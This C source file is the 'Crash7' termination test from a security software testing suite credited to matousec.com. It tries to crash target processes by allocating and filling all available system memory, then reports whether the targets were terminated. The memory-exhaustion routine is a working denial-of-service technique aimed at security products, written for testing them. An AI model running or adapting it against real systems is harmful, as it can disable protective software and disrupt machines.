/*

 Security Software Testing Suite - Crash7 (termination test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Method description:

   * Attempts to terminate target processes by allocating all system memory.

*/

#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-hook.h"

// number of allocation phases
#define ALLOC_PHASES            4
// size of array used by one phase
#define ALLOC_ARRAY_PHASE_SIZE  128
// size of array for allocations
#define ALLOC_ARRAY_SIZE        ALLOC_PHASES*ALLOC_ARRAY_PHASE_SIZE
// size of the largest allocated piece
#define ALLOC_SIZE_MAX          32*1024*1024

int main(int argc,char **argv)
{
  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  COM_CONF conf;
  if (!com_console_init_main("Crash7","crash7",argc,argv,&conf,COM_TEST_TYPE_CRASH7)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll"};
  if (!com_hook_load_libraries(used_dlls,2)) return 1;

  ULONG pids[conf.processes_cnt];
  int ret=com_proc_get_pids_from_names(conf.processes,pids,conf.processes_cnt,&err_inf);
  if (ret)
  {
    void *array[ALLOC_ARRAY_SIZE];
    for (int i=0;i<ALLOC_ARRAY_SIZE;i++) array[i]=NULL;

    srand(GetTickCount());

    for (int phase=0;phase<ALLOC_PHASES;phase++)
    {
      if (com_verbosity_get()) printf("Allocating memory - phase %d\n",phase);

      size_t size=ALLOC_SIZE_MAX;
      for (int i=0;i<ALLOC_ARRAY_PHASE_SIZE;i++)
      {
        int idx=phase*ALLOC_ARRAY_PHASE_SIZE+i;
        array[idx]=malloc(size);

        if (!array[idx])
        {
          Sleep(100);
          size/=2;
          if (size<4096) break;
          else continue;
        }

        char *p=array[idx];
        for (int j=0;j<size;j++,p++)
          *p=(char)(256.0*(rand()/(RAND_MAX+1.0)));
      }

      if (com_verbosity_get()) printf("Phase %d complete, waiting ...\n",phase);
      Sleep(5000);
    }

    if (com_verbosity_get()) printf("All phases complete.\n");

    printf("Try to work with the target processes in next 60 seconds to crash them.\n\n");
    Sleep(60000);

    if (com_verbosity_get()) printf("Freeing memory ...\n");

    for (int i=0;i<ALLOC_ARRAY_SIZE;i++)
      if (array[i]) free(array[i]);

    if (com_verbosity_get()) printf("Memory freed.\n");

    res=com_proc_termination_report(conf.processes,pids,conf.processes_cnt,&err_inf);
  }

  return com_end(res,&err_inf,&conf);
}
